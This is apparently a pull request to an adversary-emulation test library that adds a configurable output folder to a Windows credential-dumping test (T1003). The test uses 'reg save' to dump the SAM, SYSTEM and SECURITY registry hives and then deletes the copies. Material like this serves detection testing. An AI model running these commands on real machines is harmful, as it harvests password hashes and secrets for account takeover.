### PR TITLE
Fix test 4 output folder for T1003 that performs Credential Dumping

### DIFF
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -50,19 +50,27 @@ atomic_tests:
   description: |
     Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
     via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
+
   supported_platforms:
     - windows
+
+  input_arguments:
+    output_folder:
+      description: Output folder path
+      type: Path
+      default: C:\Windows\Temp
+      
   executor:
     name: command_prompt
     elevation_required: true
     command: |
-      reg save HKLM\sam sam
-      reg save HKLM\system system
-      reg save HKLM\security security
+      reg save HKLM\sam "#{output_folder}\sam"
+      reg save HKLM\system "#{output_folder}\system"
+      reg save HKLM\security "#{output_folder}\security"
     cleanup_command: |
-      rm sam
-      rm system
-      rm security
+      rm "#{output_folder}\sam"
+      rm "#{output_folder}\system"
+      rm "#{output_folder}\security"
 
 - name: Dump LSASS.exe Memory using ProcDump
   description: |


### PR DESCRIPTION
**Details:**
Fix test 4 output folder for T1003 that performs Credential Dumping

**Testing:**
Tested on Windows 10 (10.0.14393)

**Associated Issues:**
None